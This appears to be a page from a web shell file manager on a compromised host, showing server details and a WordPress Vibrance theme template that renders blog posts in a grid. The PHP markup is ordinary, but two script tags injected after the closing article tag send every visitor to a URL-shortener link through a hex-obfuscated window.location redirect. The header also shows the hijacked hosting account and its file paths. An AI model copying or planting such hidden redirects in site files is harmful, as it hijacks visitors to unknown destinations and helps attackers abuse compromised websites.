GhostManSec
Server: LiteSpeed
System: Linux premium197.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: parhudrw (1725)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: //home/parhudrw/ve.anqa.it/wp-content/themes/vibrance/template-parts/blog/style-grid-lateral.php
<?php
/**
 * Template part for displaying posts
 * Grid Lateral Style
 * Switch styles at Theme Options (WP Customizer)
 *
 * @link https://codex.wordpress.org/Template_Hierarchy
 *
 * @package Vibrance
 * @subpackage Templates
 * @since 1.0.0
 *
 */

?>

<article id="post-<?php the_ID(); ?>" <?php post_class( codeless_extra_classes( 'entry' ) ); ?> <?php echo codeless_extra_attr( 'entry' ) ?>>
    <div class="grid-holder"> 
        <div class="grid-holder-inner">    
        <div class="media-wrapper">
            <?php 
            
            $post_format = get_post_format() || '';
            
            /**
             * Generate Post Thumbnail for Single Post and Blog Page
             */ 
            
            if ( has_post_thumbnail() && $post_format != 'gallery' ) :
                
                get_template_part( 'template-parts/blog/parts/entry', 'thumbnail' );
            
            endif; ?>
            
            
            <?php
            
            /**
             * Generate Slider if needed
             */ 
            if ( get_post_format() == 'gallery' && codeless_post_galleries_data( get_post( get_the_ID() ) ) ):
            
                get_template_part( 'template-parts/blog/parts/entry', 'slider' );
            
            endif; ?>
            
            <?php
            
            /**
             * Generate Video Output
             */ 
            if ( get_post_format() == 'video' ):
            
                get_template_part( 'template-parts/blog/parts/entry', 'video' );
            
            endif; ?>
            
            <?php
            
            /**
             * Generate Audio Output
             */ 
            if ( get_post_format() == 'audio' ):
            
                get_template_part( 'template-parts/blog/parts/entry', 'audio' );
            
            endif; ?>

            

            </div>
            
            <div class="entry-wrapper">

                <?php echo codeless_get_category_colored(); ?>

                <div class="entry-wrapper-content">
            
                    <?php


                        /**
                         * Entry Header
                         * Output Entry Meta and title
                         */ 
                        ?>
                        <header class="entry-header">

                            <?php
                                if( get_post_format() != 'quote' ) {
                                    the_title( '<h2 class="entry-title"><a href="' . esc_url( get_permalink() ) . '" rel="bookmark">', '</a></h2>' );
                                }
                            ?>

                        </header><!-- .entry-header -->

                </div><!-- .entry-wrapper-content -->

            </div><!-- .entry-wrapper -->

        </div>

    </div> 
	
</article><!-- #post-## -->
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>